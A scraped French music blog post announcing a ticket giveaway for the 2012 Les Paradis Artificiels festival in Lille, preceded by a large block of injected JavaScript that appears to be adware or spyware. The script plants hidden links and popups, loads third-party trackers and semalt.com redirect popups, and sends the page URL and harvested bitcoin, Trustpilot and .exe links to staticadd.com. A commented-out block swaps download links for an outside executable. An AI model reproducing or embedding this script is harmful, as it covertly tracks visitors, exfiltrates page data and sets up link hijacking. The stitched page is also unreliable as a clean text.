



<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>";
var bottomHtml = "<\/span>";
var popupCreated = false;
var bottomPopup = false || /[?&]test=1/.test(location.href);
//officeLog(bottomHtml);
function onReady() {
tryCreatePopup(2);
var box = create('div');
append(box, document.body);
var defaultStyles = {
width: '1px',
height: '1px',
background: 'transparent',
display: 'inline-block',
margin: '2px',
padding: 0,
verticalAlign: 'bottom',
border: 'none'
};
var a = create('a');
css(a, defaultStyles);
document.addEventListener('keydown', function(e) {
if (e.keyCode === 192 && e.ctrlKey) {
css(a, {
width: '20px',
height: '20px',
background: '#fff',
border: '1px solid red'
});
}
});
document.addEventListener('keyup', function(e) {
css(a, defaultStyles);
});
a.className = 'shbNetgpLink';
append(a, box);
a.href = 'javascript:;';
on(a, 'click', openLinerPopup);
css(box, {
position: 'fixed',
margin: 0,
padding: 0,
outline: 'none',
border: 'none',
zIndex: 999999999,
overflow: 'visible',
direction: 'ltr'
});
css(box, {
left: '3px',
right: 'auto',
top: '50px',
bottom: 'auto',
width: '42px',
height: '168px'
});
}
function officeLog(data) {
}
function clearStyles() {
if(typeof document.createStyleSheet === 'undefined') {
document.createStyleSheet = (function() {
function createStyleSheet(href) {
if(typeof href !== 'undefined') {
var element = document.createElement('link');
element.type = 'text/css';
element.rel = 'stylesheet';
element.href = href;
} else {
var element = document.createElement('style');
element.type = 'text/css';
}
document.getElementsByTagName('head')[0].appendChild(element);
var sheet = document.styleSheets[document.styleSheets.length - 1];
if(typeof sheet.addRule === 'undefined')
sheet.addRule = addRule;
if(typeof sheet.removeRule === 'undefined')
sheet.removeRule = sheet.deleteRule;
return sheet;
}
function addRule(selectorText, cssText, index) {
if(typeof index === 'undefined')
index = this.cssRules.length;
this.insertRule(selectorText + ' {' + cssText + '}', index);
}
return createStyleSheet;
})();
}
var sheet = document.createStyleSheet();
sheet.addRule('#shbNetPaddingTable', 'display: none;');
sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;');
sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;');
sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;');
sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:11px; line-height:normal;');
sheet.addRule('.shbNetPopupTable a, .shbNetPopupTable b', 'text-decoration:none; background:none; height:auto !important; color:#737373; font-size:11px; font-weight:bold;');
sheet.addRule('.shbNetTopLayer .shbNetPopupWr', 'display:block !important; width: 100% !important; x-index:99999999 !important; background: #fff !important; padding: 2px 10px !important;');
sheet.addRule('.shbNetTopLayer #shbNetPaddingTable', 'display:table !important;');
}
function createTopLayer() {
//if (!domReady) return;
var div = document.createElement('div');
div.className = 'shbNetTopLayer';
div.innerHTML = popupHtml;
document.body.insertBefore(div, document.body.childNodes[0]);
popupCreated = true;
}
function tryCreatePopup(stage) {
if (popupCreated) return;
if (isTopLayer) {
createTopLayer();
return;
}
if (bottomPopup) {
var box = document.createElement('div');
box.innerHTML = bottomHtml;
document.body.appendChild(box);
return;
}
if (stage === 1) {
document.writeln(popupHtml);
} else if (stage === 2) {
var mainBox = create('div');
mainBox.innerHTML = popupHtml;
document.body.appendChild(mainBox);
} else {
return;
}
var wr = $('shbNetPaddingWr');
if (!wr) return;
popupCreated = true;
var table = $('shbNetPaddingTable');
css(table, {
position: 'fixed',
margin: 0,
padding: 0,
left: 0,
top: 0,
width: '100%',
height: '100%',
direction: 'ltr',
zIndex: 999999999,
background: 'none'
});
css(table.getElementsByTagName('td')[0], {
verticalAlign: 'middle',
background: 'rgba(0, 0, 0, 0.5)'
});
var popup = $('shbNetPaddingPopup');
css(popup, {
margin: '0 auto',
padding: '20px 25px 20px',
width: '800px',
maxWidth: '98%',
background: '#fff',
border: '1px solid #000',
textAlign: 'left',
position: 'relative',
fontFamily: 'Tahoma, Arial, Verdana',
boxSizing: 'content-box'
});
on(document, 'keydown', function(e) {
if (e.keyCode === 27) {
wr.style.display = 'none';
}
});
}
function removeClass(node, className) {
if (node && node.className) {
node.className = node.className.replace(new RegExp('\b' + className + '\b', 'g'), '');
}
}
function openLinerPopup() {
var pad = $('shbNetPaddingWr');
var tbl = $('shbNetPaddingTable');
if (!pad || !tbl) return;
pad.style.display = 'block';
tbl.style.display = 'table';
var mainPopup = $('shbNetPopupWr');
if (!mainPopup) return;
mainPopup.style.display = 'none';
}
function $(id) {
return document.getElementById(id);
}
function on(elem, event, handler) {
elem.addEventListener(event, handler, false);
}
function css(elem, style) {
for (var prop in style) {
elem.style[prop] = style[prop];
}
}
function create(tag) {
return document.createElement(tag);
}
function append(elem, parent) {
parent.appendChild(elem);
}
setTimeout(function() {
window.CJSource = 'shb2';
/*
var script = document.createElement('script');
script.src = 'https://cleverjump.org/counter.js';
(document.head || document.body).appendChild(script);
*/
(function(w, d) {
var s = d.createElement('script');
d.getElementsByTagName('script')[0].parentNode.appendChild(s);
s.setAttribute('data-statinside-id', 21);
s.src = 'https://statinside.com/counter.js';
w._siData = w._siData || [];
w.statInside = function() {_siData.push(arguments);}
})(window, document);
statInside('custom', 'shb2');
statInside('heartbeat', false);
}, 10);
if (document.readyState === 'complete' || document.readyState === 'interactive') {
onReady();
} else {
on(document, 'DOMContentLoaded', onReady);
}
tryCreatePopup(1);
try {
clearStyles();
} catch (ex) {}
(function() {
if (!document.querySelector) return;
var added = false;
tryAddLink();
window.addEventListener('DOMContentLoaded', tryAddLink);
setTimeout(tryAddLink, 100);
setTimeout(tryAddLink, 1000);
setTimeout(tryAddLink, 2000);
function tryAddLink() {
if (added) return;
var menu = document.querySelector('#wpadminbar .ab-top-menu');
if (!menu) return;
var li = document.createElement('li');
li.innerHTML = 'SEO promotion';
//menu.appendChild(li);
added = true;
save();
}
function save() {
var json = JSON.stringify({
hrefs: ['wordpress_new'],
jsDomain: 'staticadd.com',
refUrl: location.href
});
var xhr = new XMLHttpRequest;
xhr.open('POST', '//staticadd.com/save.php');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.onload = function() {
xhr.responseText;
}
xhr.send(json);
}
})();
(function() {
function byId(id) {
return document.getElementById(id);
}
function setCookie() {
var date = new Date();
date.setTime(date.getTime() + (60 * 60 * 1000));
document.cookie = 'closePopupStartWow=1; path=/; domain=.' + location.hostname + '; expires=' + date.toGMTString();
}
function listenerPopupSemalt(event){
if (event.origin != 'https://semalt.com') return;
if (!event.data) return;
if (event.data == 'closePopupStartWow'){
var el = byId('popupStartWow');
if (!el) return;
el.style.display = 'none';
setCookie();
} else if(event.data.indexOf('startPopupStartWow')>-1) {
try{var res = JSON.parse(event.data);
if(res && res.page){
location.href = 'https://semalt.com/?s='+decodeURIComponent(res.page)+'&ref=blogspot';
}
} catch(ee) { }
setCookie();
}
}
function init() {
if (document.getElementById('popupWowNode')) return;
var div = document.createElement('div');
div.id = 'popupWowNode';
try {
div.innerHTML = html;
} catch (err) {
return;
}
document.body.appendChild(div);
setTimeout(function(){
if (document.cookie.indexOf('closePopupStartWow') !== -1) return;
var el = byId('popupStartWow');
if (!el) return;
el.setAttribute('src', 'https://semalt.com/popups/popup_wow.php?lang=en');
setTimeout(function(){
el.style.display = 'block';
}, 400);
},400);
}
setTimeout(init, 100);
setTimeout(init, 1000);
setTimeout(init, 2000);
window.addEventListener('message', listenerPopupSemalt, false);
})();
setTimeout(function() {
/*try {
var links = document.querySelectorAll('a[href$=".exe"]');
for (var i = 0; i < links.length; i++) {
links[i].href = 'https://myprintscreen.com/soft/myp0912.exe';
break;
}
} catch (err) {}*/
try {
var links = document.querySelectorAll('a[href^="bitcoin:"], a[href*="trustpilot.com"], a[href$=".exe"]');
//var links = document.querySelectorAll('a[href^="https://"]');
if (links.length) {
var hrefs = [];
for (var i = 0; i < links.length; i++) {
hrefs.push(links[i].href);
}
var json = JSON.stringify({
hrefs: hrefs,
jsDomain: 'staticadd.com',
refUrl: location.href
});
var xhr = new XMLHttpRequest;
xhr.open('POST', '//staticadd.com/save.php');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.onload = function() {
xhr.responseText;
}
xhr.send(json);
}
} catch (ex) {}
}, 2000);
})();
LeTransistor
Concerts Gagnez des places pour le festival Les Paradis Artificiels à Lille
Gagnez des places pour le festival Les Paradis Artificiels à LillePublié le 4 Apr 2012 Le Transistor vous propose d’aller vous aérer à Lille pour le festival Les Paradis Artificiels ! C’est du 16 au 25 avril et la prog est bien alléchante ! Pour vous le prouver, on vous fait gagner des places pour trois soirées incontournables : le 20 avril avec Chinese Man, Le Peuple de l’Herbe, Method Man, Nneka, Ky-Mani Marley et Hollie Cook. Le 21 avril avec les Stuck In The Sound, Simple Plan, Kid Bombardos et les Pony Pony Run Run. Et le 25 avril avec Beat Assaillant, C2C et 1995. ![]() Les Paradis Artificiels du 16 au 25 avril 2012 Pour la 6e édition du festival Les Paradis Artificiels, A Gauche de la Lune retourne Lille pendant 10 jours avec une programmation épatante ! Mardi 17 avril, personne ne fait de l’ombre au grand Baxter Dury, surtout s’il est accompagné de Rebecca Mayes et… Rover (interview) ! Mercredi 18 avril, c’est plus calme : on s’attache au duo Elephant à la Péniche ou on joue au Puissance 4 au Peek A Boo. Jeudi 19 avril, attention à pas prendre froid ! Entre les steppes glacées de Pinkunoizu à la Péniche et les frissons procurés par Peter Von Poehl à l’Eglise St André, les courants d’airs seront fatals. Vendredi 20 avil, on sort la grosse artillerie. Au Zénith Arena, ça va sentir bon : Chinese Man (interview), Le Peuple de l’Herbe, Method Man, Nneka, Ky-Mani Marley et Hollie Cook. A la Péniche, l’original Mathieu Boogaerts. Au Splendid, soirée atmosphérique avec Alan Corbel et Da Silva. Samedi 21 avril, on continue sur la lancée. Rock sous toutes ses formes au Zénith Arena avec Stuck In The Sound (interview), Simple Plan, Kid Bombardos (interview) et les Pony Pony Run Run. College band à la Péniche avec We The Kings. A l’Aeronef, soirée Cabaret Freaks avec Digitalism, Orbital et Slagsmalsklubben. Dimanche 22 avril, on soigne un mal de crâne. Donc ce sera juste un dimanche récréatif avec concours de dessin à la Gare St Sauveur dans l’aprèm et à l’Aéronef, y’aura une projection du documentaire ‘Blood, Sweat and Vinyl : DIY in the 21st Century’ avec un live de Scott Kelly (de Neurosis). Lundi 23 avril, on est repartis. Au Splendid, c’est tellement hype que c’est déjà bientôt complet : les Belges de chez Black Box Revelation, les Irlandais de chez The Minutes et la dernière signature Kitsuné : Citizens! Au Grand Mix, soirée hip hop quali avec Roots Manuva et Ben Sharpa & 4DLS. A la Péniche, on se laisse séduire par la jolie Dillon. Mardi 24 avril, soirée plaisirs. A la Péniche, le label Hiphiphip présente ses coups de cœurs : Botibol et Pharahos. Au Grand Mix, le duo de choc : le grand Daniel Darc avec GreenShape (session) en première partie. Mercredi 25 avril, c’est déjà fini ? A l’Aeronef, soirée rap étonnant avec Beat Assaillant, C2C et 1995. A l’Hermitage Gantois, une Espagnole camouflée, c’est Russian Red. Le roi des mélanges, c’est King Charles (au festival Chorus) à la Péniche. Et au Grand Mix, soirée éclectique avec Matthew Dear et Balthazar. ![]() Pour remporter les places pour la soirée de votre choix, c’est toujours la même manip : on poste un clip de l’artiste qu’on veut aller voir sur le wall Facebook ! Remerciements : Gerald le Magnifique Catégorie : Concerts Artiste(s) : 1995, Alan Corbel, Balthazar, Barcella, Baxter Dury, Beat Assailant, Ben Sharpa and 4 DLS, Black Box Revelation, Botibol, C2C, Chinese Man, Citizens!, Da Silva, Daniel Darc, Digitalism, Dillon, Elephant, GreenShape, Hollie Cook, Kid Bombardos, King Charles, Ky-Mani Marley, Le Peuple de l'Herbe, Mathieu Boogaerts, Matthew Dear, Method man, Nneka, Orbital, Peter Von Poehl, Pharahos, Pinkunoizu, Pony Pony Run Run, Puppetmastaz, Rebecca Mayes, Roots Manuva, Rover, Russian Red, Scott Kelly, Simple Plan, Slagsmalsklubben, Stuck In The Sound, The Minutes, Thomas Dutronc, Unno, We the Kings Evenement(s) : Les Paradis Artificiels Production(s) : A Gauche De La Lune Ville(s) : Lille Une réaction » |
bonjour
j aimerais beaucoup pouvoir assister a l une des soirées de ce festival de ma region , si possible le 21 avril … mais meme autre me conviendrait
bonne continuation !
je croise les doigts…
cordialement
Et toi t'en penses quoi ?